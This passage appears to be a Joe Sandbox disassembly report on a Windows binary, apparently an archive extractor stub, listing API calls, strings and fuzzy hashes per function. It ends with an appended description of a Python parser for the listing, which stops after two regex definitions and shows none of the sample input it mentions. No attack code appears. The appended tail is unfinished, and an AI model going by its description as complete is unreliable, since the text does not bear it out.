                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: 065e5c232068dcdc6fd48510ea28dd2b75d0b51dddf28891cb868b84575c6aea
                                                                                    • Instruction ID: 6dd3e1554674ef970e5fe4ae2c8b3f05e91ac4fd79af37e7e12438cd37106797
                                                                                    • Opcode Fuzzy Hash: 065e5c232068dcdc6fd48510ea28dd2b75d0b51dddf28891cb868b84575c6aea
                                                                                    • Instruction Fuzzy Hash: 2E01717260D205BFC3119B28EC80E26BBA9E7493A4F050467F541D2930D3319DE1DFA1
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0015CE57
                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0015CE66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: LTR$RTL
                                                                                    • API String ID: 3537982541-719208805
                                                                                    • Opcode ID: 007a2929b6e3719a53ee28854b4e3f8410513c5b9cccc7fe24cc08be87ecfff5
                                                                                    • Instruction ID: b8968c721ae8f7dbd89850fed52786b780b10d9c0c09cf7da9eeff80f02e03f8
                                                                                    • Opcode Fuzzy Hash: 007a2929b6e3719a53ee28854b4e3f8410513c5b9cccc7fe24cc08be87ecfff5
                                                                                    • Instruction Fuzzy Hash: D2F02B31604358ABE7646A755C0BF673BACE789701F10425DF605960C0DBA19A4D8BF5
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                    • Instruction ID: 0c111c22867a89cab720768c8376f8be99556781b1e363403f2b0b5d2195e649
                                                                                    • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                    • Instruction Fuzzy Hash: 63A16C71900B869FD725CF18C891BAEBBF5EF25354F24816DE44D9B242C3389D41C751
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00157F55,?,?,?), ref: 00159FD0
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00157F55,?,?), ref: 0015A014
                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00157F55,?,?,?,?,?,?,?,?), ref: 0015A095
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,00157F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0015A09C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 2287278272-0
                                                                                    • Opcode ID: 314a1cc44c2ab6850d0f4dbef317959eb47ae4f2a5465dbf7440fedddcaac716
                                                                                    • Instruction ID: 2fd2864a88a29554728bc86717e3b4fefa6c74fe735644a84911f3ab234f941e
                                                                                    • Opcode Fuzzy Hash: 314a1cc44c2ab6850d0f4dbef317959eb47ae4f2a5465dbf7440fedddcaac716
                                                                                    • Instruction Fuzzy Hash: 2941CA31288384EAE731DE24DC45BAEBBE8AF85701F04091EB9E4DB1C1D7649A4C9B53
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00172794,00000000,00000000,00172FC2,?,00172FC2,?,00000001,00172794,F5E85006,00000001,00172FC2,00172FC2), ref: 00179440
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001794C9
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001794DB
                                                                                    • __freea.LIBCMT ref: 001794E4
                                                                                      • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: d48a578350056b80c74a9397fdd82cd4ff9a0d8a27f86226484a70f347df5d2a
                                                                                    • Instruction ID: 56c883d21a0d5b72bb72fbf88d505a1057a268ee2f7f26150fd5c435d8e05d00
                                                                                    • Opcode Fuzzy Hash: d48a578350056b80c74a9397fdd82cd4ff9a0d8a27f86226484a70f347df5d2a
                                                                                    • Instruction Fuzzy Hash: 48319072A0020AABDB25DF64DC45DAE7BB5EF44710F158168FC09D7190E735CD9ACB90
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 00169A86
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00169AA7
                                                                                    • DeleteObject.GDI32(00000000), ref: 00169ACF
                                                                                    • DeleteObject.GDI32(00000000), ref: 00169AEE
                                                                                      • Part of subcall function 00168BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00169AC8,00000066), ref: 00168BE1
                                                                                      • Part of subcall function 00168BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00169AC8,00000066), ref: 00168BF9
                                                                                      • Part of subcall function 00168BD0: LoadResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C0C
                                                                                      • Part of subcall function 00168BD0: LockResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 142272564-0
                                                                                    • Opcode ID: 1d1a6e7304a6d24fda18367880aef2e95215eca47014087e70b7787100ce9d7f
                                                                                    • Instruction ID: 5c63d8c355c0c805b3db379fd5d8d56e264aff9d0fe1a2c81a985e89d8257543
                                                                                    • Opcode Fuzzy Hash: 1d1a6e7304a6d24fda18367880aef2e95215eca47014087e70b7787100ce9d7f
                                                                                    • Instruction Fuzzy Hash: BE01263364121437D6117BB89C42EBFB6AEEF95B61F480111FE00E7691DF618D2582F2
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00171020
                                                                                      • Part of subcall function 00171658: ___AdjustPointer.LIBCMT ref: 001716A2
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00171037
                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00171049
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0017106D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 2633735394-0
                                                                                    • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                    • Instruction ID: 866d9e62a3d04c6897e1443b38310e902ba7ce501760ab2b166b83b520afe078
                                                                                    • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                    • Instruction Fuzzy Hash: E801E532400149FBCF225F59CC45EEA3BBAEF69754F158119FA1C66120C772E8B1EBA0
                                                                                    APIs
                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00170B66
                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00170B6B
                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00170B70
                                                                                      • Part of subcall function 00171C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00171C1F
                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00170B85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                    • String ID:
                                                                                    • API String ID: 1761009282-0
                                                                                    • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                    • Instruction ID: 9d0eb2317ba0a8e7bcb2db8b7cb3a6239a81751a6b5d61f5085ff177e418b8ba
                                                                                    • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                    • Instruction Fuzzy Hash: 06C04C6C184340F81C273AF825021AD13700C7B7D9785E1C6EC9D170135F06474E5076
                                                                                    APIs
                                                                                      • Part of subcall function 00168BA5: GetDC.USER32(00000000), ref: 00168BA9
                                                                                      • Part of subcall function 00168BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00168BB4
                                                                                      • Part of subcall function 00168BA5: ReleaseDC.USER32(00000000,00000000), ref: 00168BBF
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00168D24
                                                                                      • Part of subcall function 00168EEA: GetDC.USER32(00000000), ref: 00168EF3
                                                                                      • Part of subcall function 00168EEA: GetObjectW.GDI32(?,00000018,?), ref: 00168F22
                                                                                      • Part of subcall function 00168EEA: ReleaseDC.USER32(00000000,?), ref: 00168FB6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: (
                                                                                    • API String ID: 1061551593-3887548279
                                                                                    • Opcode ID: e7d5b658fe04b43a89a65e0d2b0c8d42da67ad5fa7c0891b558a9fed1e90d878
                                                                                    • Instruction ID: d045de7acd6d61306b97f69b935f173e189e11f46a1f39cd8f7b6698fac25a20
                                                                                    • Opcode Fuzzy Hash: e7d5b658fe04b43a89a65e0d2b0c8d42da67ad5fa7c0891b558a9fed1e90d878
                                                                                    • Instruction Fuzzy Hash: D56114B1204201AFD314DFA4C888E6BBBE9FF89704F10491DF999C7260DB72E915CB62
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    • Opcode ID: fad7e7ee27fe1a33f80d6df6d9abb81f7597b1d116712b82b4e21807568b764b
                                                                                    • Instruction ID: 0bcad8e74d23bd83b3bd532b54e3e5109937165f98042af5e64fd986e6d8db1b
                                                                                    • Opcode Fuzzy Hash: fad7e7ee27fe1a33f80d6df6d9abb81f7597b1d116712b82b4e21807568b764b
                                                                                    • Instruction Fuzzy Hash: 3251B77128C300FBEA371A948C5AF337655AF1DF00F21C50EB796684E5CBE258746716
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015761E
                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00157799
                                                                                      • Part of subcall function 0015A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A0D7
                                                                                      • Part of subcall function 0015A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A108
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$H_prologTime
                                                                                    • String ID: :
                                                                                    • API String ID: 1861295151-336475711
                                                                                    • Opcode ID: dc9a8ff5502efd46a0413df2f95409081d3b840e10fd366e8e889bb9db479140
                                                                                    • Instruction ID: 7d8709b2e672051f1e9c5315a47c166b7d5db15fc7903304167dba201895570f
                                                                                    • Opcode Fuzzy Hash: dc9a8ff5502efd46a0413df2f95409081d3b840e10fd366e8e889bb9db479140
                                                                                    • Instruction Fuzzy Hash: F641E771804658EAEB24EB60EC46EEE737CEF54341F004099B965AB082DB705F8DCF61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 0-253988292
                                                                                    • Opcode ID: de69de3c164524f04a2f34535d84d3858466b03b073f352d52e78860133c27e9
                                                                                    • Instruction ID: 094ca900e4a2938d1148135e0820d6ca8a5699a1c9185594ad5e0e9594cfd839
                                                                                    • Opcode Fuzzy Hash: de69de3c164524f04a2f34535d84d3858466b03b073f352d52e78860133c27e9
                                                                                    • Instruction Fuzzy Hash: 77419231408219EBCB61AF21CC81AEE7769FF14352F108126FCB4AA141F774DA9D8AA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Shell.Explorer$about:blank
                                                                                    • API String ID: 0-874089819
                                                                                    • Opcode ID: ccadbe591de220f5d217b9672060d76275e4fc927bac27ad3d2d04a25c45c203
                                                                                    • Instruction ID: e1c4bef41dcb5bec3adb1c4f89e45d202500b7840b00c8304c7ea2b942f1d3b7
                                                                                    • Opcode Fuzzy Hash: ccadbe591de220f5d217b9672060d76275e4fc927bac27ad3d2d04a25c45c203
                                                                                    • Instruction Fuzzy Hash: 4B219F75300606AFD314AF74CC95E26B76CBF98710B148B19F5058B681CF71EC64CBA1
                                                                                    APIs
                                                                                      • Part of subcall function 0015DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0015DED4
                                                                                      • Part of subcall function 0015DEB5: GetProcAddress.KERNEL32(00191E58,CryptUnprotectMemory), ref: 0015DEE4
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0015DF2E), ref: 0015DFB5
                                                                                    Strings
                                                                                    • CryptUnprotectMemory failed, xrefs: 0015DFAD
                                                                                    • CryptProtectMemory failed, xrefs: 0015DF75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                    • API String ID: 2190909847-396321323
                                                                                    • Opcode ID: b78cc94851f40a9c3a6101da8aeb7e93b24a7863111b1c05dd86a68338f2dfed
                                                                                    • Instruction ID: 82f0ea27d0a301ca0a44baaf789234a1cd3a83559f8f19a2022e5962a9cc89d8
                                                                                    • Opcode Fuzzy Hash: b78cc94851f40a9c3a6101da8aeb7e93b24a7863111b1c05dd86a68338f2dfed
                                                                                    • Instruction Fuzzy Hash: 44113171708116EBEB26A729EC01E6A7359AFD4751B05401BFC23DF191DB70DD4A87D0
                                                                                    APIs
                                                                                      • Part of subcall function 0015CED7: GetWindowRect.USER32(?,?), ref: 0015CF0E
                                                                                      • Part of subcall function 0015CED7: GetClientRect.USER32(?,?), ref: 0015CF1A
                                                                                      • Part of subcall function 0015CED7: GetWindowLongW.USER32(?,000000F0), ref: 0015CFBB
                                                                                      • Part of subcall function 0015CED7: GetWindowRect.USER32(?,?), ref: 0015CFE8
                                                                                      • Part of subcall function 0015CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0015D007
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                    • SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ClientItemLong
                                                                                    • String ID: 0
                                                                                    • API String ID: 660763476-4108050209
                                                                                    • Opcode ID: 97b201fe1ab446a94319c1091df7dfa4f27efabc15ae0061fbdc0e57a636f286
                                                                                    • Instruction ID: 38b1be1995c3eb4483abf4a6c27e0d8da66832d2f5c6229051dd91ef84e37475
                                                                                    • Opcode Fuzzy Hash: 97b201fe1ab446a94319c1091df7dfa4f27efabc15ae0061fbdc0e57a636f286
                                                                                    • Instruction Fuzzy Hash: 90F0D1B0040248FBDF571F50881ABA93B99AF04766F094025FE5458491C774C998DF64
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,0015FD0B,?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FACD
                                                                                    • GetLastError.KERNEL32(?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FAD9
                                                                                      • Part of subcall function 00156DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00156DF1
                                                                                    Strings
                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0015FAE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1091760877-2248577382
                                                                                    • Opcode ID: 5af7d9888086be5014e45a7b84c90772968daf1255faf497fab4d41050a2cfa1
                                                                                    • Instruction ID: e3fef65039622ce282029d50713a92bfda015c38cd09c22bf0d07eb400d24cfe
                                                                                    • Opcode Fuzzy Hash: 5af7d9888086be5014e45a7b84c90772968daf1255faf497fab4d41050a2cfa1
                                                                                    • Instruction Fuzzy Hash: A2D02B3150843063D54233245C06E6E38145F22371F700714F9356A1E5CB200E8987D1
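The per-function entries above all share one fixed layout: an APIs list of `Module.Function(args), ref: address` lines (subcall lines carry a `Part of subcall function X:` prefix), an optional Strings list with `xrefs`, and a Similarity block whose last field is the Instruction Fuzzy Hash. The parser and rule set below is an added example for triaging such a listing offline; it is not Joe Sandbox code, the flags are the editor's own heuristics rather than the report's signatures, and the sample input is a trimmed copy of three entries from this section (the Memory Dump Source lines, which do not affect parsing, were shortened).

```python
"""Parse Joe Sandbox per-function entries and run triage heuristics (added example)."""
import re

# One API line: optional "Part of subcall function X:" prefix, Module.Function(args), ref: address
API_LINE = re.compile(r"^(?:Part of subcall function ([0-9A-F]+): )?"
                      r"([A-Za-z_0-9]+)\.([A-Za-z_0-9]+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$")
STRING_LINE = re.compile(r"^(.*), xrefs: ([0-9A-F]+)$")
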